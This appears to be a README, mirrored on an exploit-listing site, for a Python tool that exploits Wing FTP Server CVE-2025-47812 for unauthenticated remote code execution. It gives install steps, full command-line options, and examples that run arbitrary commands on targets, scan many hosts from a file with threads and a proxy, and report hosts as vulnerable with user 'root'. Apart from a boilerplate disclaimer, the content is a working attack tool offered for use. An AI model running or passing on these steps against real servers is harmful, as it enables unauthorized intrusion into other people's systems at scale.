## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XJUAREZ-CVE-2025-47812
# 🚀 Wing FTP Exploit - CVE-2025-47812
针对 Wing FTP Server CVE-2025-47812 的增强型利用工具 - 未授权远程代码执行 (RCE)
## 🔧 安装
克隆此仓库并进入目录:
root@kitploit:~
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
或者直接下载 `CVE-2025-47812.py` 脚本并运行它。
## 🚀 使用方法
root@kitploit:~
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
Exploit for Wing FTP Server CVE-2025-47812 - enhanced version
options:
-h, --help 显示此帮助信息
-u URL, --url URL 目标URL(例如 http://192.168.1.100:5466)
-f FILE, --file FILE 包含URL列表的文件(每行一个)
-c COMMAND, --command COMMAND
要执行的命令(默认: echo CVE-2025-47812)
-U USERNAME, --username USERNAME
用户名(default: anonymous)
-P PASSWORD, --password PASSWORD
密码(default: 空)
--check 检查模式:仅检测是否易受攻击(使用无害命令)
-v, --verbose 详细模式(显示详细信息)
--proxy PROXY 代理(例如 http://127.0.0.1:8080)
--timeout TIMEOUT 超时秒数(default: 10)
-o OUTPUT, --output OUTPUT
保存结果的文件
--output-format {txt,json,csv}
输出格式(default: txt)
--threads THREADS 扫描多个目标时的线程数(default: 5)
--no-progress 隐藏进度条
## 🎯 基本示例
### 测试单个目标并执行命令:
root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
### 检查模式(仅检测漏洞):
root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
### 从文件扫描多个目标:
root@kitploit:~
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json
### 使用代理并显示详细信息:
root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
## 📁 目标文件结构
文件应包含每行一个URL,例如:
root@kitploit:~
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466
## 📊 输出格式
### TXT
root@kitploit:~
http://192.168.1.10:5466 - VULNERABLE - 用户: root
http://192.168.1.11:5466 - SEGURO - 不易受攻击
### JSON
root@kitploit:~
[
{
"target": "http://192.168.1.10:5466",
"vulnerable": true,
"info": "用户: root"
}
]
### CSV
root@kitploit:~
Target,Vulnerable,Info
http://192.168.1.10:5466,True,用户: root
## ⚠️ 警告
此利用工具仅供教育目的和授权安全测试使用。未经明确同意对系统进行未经授权的使用是违法的,并可能带来严重的法律后果。作者不承担任何滥用责任。
## 🤝 致谢
* 原作者: Sheikh Mohammad Hasan (4m3rr0r) – 发现与基础利用。
* 改进与重构: 0xJuarez – 添加了大规模扫描、颜色、代理支持、多种输出格式以及可用性改进。
如果你喜欢这个作品,别忘了在GitHub上点个星 ⭐!
## 📄 许可证
本项目基于 MIT 许可证授权 – 详情请见 LICENSE 文件。